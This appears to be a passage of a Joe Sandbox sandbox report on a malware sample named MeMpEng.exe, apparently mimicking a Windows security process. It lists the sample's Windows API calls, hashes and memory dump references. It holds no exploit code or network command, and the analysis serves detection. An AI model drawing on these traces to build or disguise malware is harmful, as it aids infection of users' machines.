                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                          • Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
                                                          • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                          • Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                                          • Instruction ID: e355f0d3af3fae611af142f11dea5172e840e8f974d60c5f977c655607c85d86
                                                          • Opcode Fuzzy Hash: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                                          • Instruction Fuzzy Hash: 5801DF71A04605BBEB149F94DE48BAFB668FF80308F10443EF001B21D0D7B84E41976D
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040224E
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive, xrefs: 0040228E
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive
                                                          • API String ID: 542301482-2785362531
                                                          • Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                                          • Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
                                                          • Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                                          • Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402580
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                                          • Instruction ID: 6577050f37a29122a5cb82ae63a7e3627040baffe8f236fb698a7bc144352859
                                                          • Opcode Fuzzy Hash: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                                          • Instruction Fuzzy Hash: 51119E71904216EADF15DFA0DA589AEB7B4FF04348F20443FE802B62D0D7B84A45DB5E
                                                          APIs
                                                          • MulDiv.KERNEL32 ref: 004013E4
                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                          • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                                          • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                          • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004056BC
                                                            • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          • OleUninitialize.OLE32 ref: 00405708
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitialize
                                                          • String ID:
                                                          • API String ID: 2896919175-0
                                                          • Opcode ID: b5753e3ad58a69f25ac6974e6d5875c31233b5eee52de9f565f0f637ff460faa
                                                          • Instruction ID: 63975ff93ca4750656595f1bf98ef34e31a5955aa7ce839472b70166dafb6141
                                                          • Opcode Fuzzy Hash: b5753e3ad58a69f25ac6974e6d5875c31233b5eee52de9f565f0f637ff460faa
                                                          • Instruction Fuzzy Hash: BCF0F0B38009009BEA815750AD01B277BA8FBC1305F04883BEF88A22F0DF3A08018B1E
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA
                                                          • GetLastError.KERNEL32 ref: 00405AF8
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                                          • Instruction ID: 98303f18ab294370b9404d3d0833ea925ed9fe29ea468c813ed2a63de2513d45
                                                          • Opcode Fuzzy Hash: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                                          • Instruction Fuzzy Hash: 28E04F76908610DFE748EBA4AE499AEB7B4FF80365B20497FE001F11E1DBB94D00966D
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                          • CloseHandle.KERNEL32(?), ref: 00405B6D
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                          • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                                          • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                          • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                                          • Instruction ID: d7c79e80ad2a22e998040c9ddd7ac57f7a29ae31a8ed4af3f77ef46bec42490e
                                                          • Opcode Fuzzy Hash: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                                          • Instruction Fuzzy Hash: 48E04F32A14514ABCB18CBA8EDD086E73B6FB84310310453FE502B36A4C6789C00CB58
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406975
                                                            • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                            • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                                            • Part of subcall function 004068D8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040693E
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B16
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 6A2B2C57
                                                          Memory Dump Source
